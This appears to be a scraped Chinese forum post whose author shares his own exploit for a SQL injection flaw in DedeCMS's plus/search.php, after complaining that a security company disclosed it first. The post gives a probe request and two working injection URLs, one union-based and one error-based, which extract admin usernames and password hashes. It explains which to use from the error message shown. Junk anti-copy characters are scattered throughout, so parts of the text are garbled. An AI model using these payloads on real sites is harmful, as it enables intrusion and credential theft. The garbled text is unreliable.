转载不加作者名的没JJ7 L6 A1 V: t2 A, Z v
& g1 [! F) F1 h( S% e哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
( j- @/ m3 g- O* |: @# C
, [6 x6 }. x: v/ t* |! j既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
. W! k* B. k& A# H$ c @
0 |, G( d- K0 L5 K8 U% W9 x( a- @我一般是这样测试的:
/ R! ^8 s9 t4 P4 {, ], S9 I$ t
: \5 Z2 d+ {: p$ i# X3 _4 Y提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a V) q) ?9 T4 v H+ n' ]1 p
& @& u! u/ `8 _! C' x- r0 ?转载不加作者名的没JJ
8 L! F( F. p# T( a% P- {$ p9 O) t
作者:鬼哥8 x% ?3 J9 W- t$ V
3 Z3 |. M6 @: Q4 P! B
4 Z# m g6 N9 K+ Z: r/ L& D1 P: v
+ `$ z; D) @+ S/ y8 d& E- ^
看结果如果提示
7 L8 t5 F' g, ^( S, C3 K( T4 Z$ T$ f L
Safe Alert: Request Error step 2 !
/ X; \9 L, u0 [& Q @2 S8 R. i$ |5 b# q r
那么直接用下面的exp4 L1 Y! [+ g+ ^5 P0 D |
. J9 R I0 i3 ^9 X) ^/ p5 S2 M" t
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a0 x0 J. H4 K1 y7 B
1 i; C7 l) g3 A% |/ n- i# V# z" e c0 G& v
看结果如果提示' O s7 S0 Z- P% j! S R' R' v
& \/ ?) r+ u3 Z9 G. p7 VSafe Alert: Request Error step 1 !
* \1 }0 D+ D/ Z! R; u
. i2 E6 J* w! l) h% A那么直接用下面的exp
7 D/ |" z8 ?, |# k6 s! x' q, m4 I* } G+ R+ E0 w
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a/ P9 \, Q6 B4 [7 |
* j' `. U3 _& F& u2 j$ z. A; U8 `
! n$ b5 ^0 J9 w& l* h+ o- Q# j如果正常显示证明漏洞不存在了。+ _6 _7 U/ ]* W9 X2 g# N
' x" {! s) c' }8 K转载不加作者名的没JJ |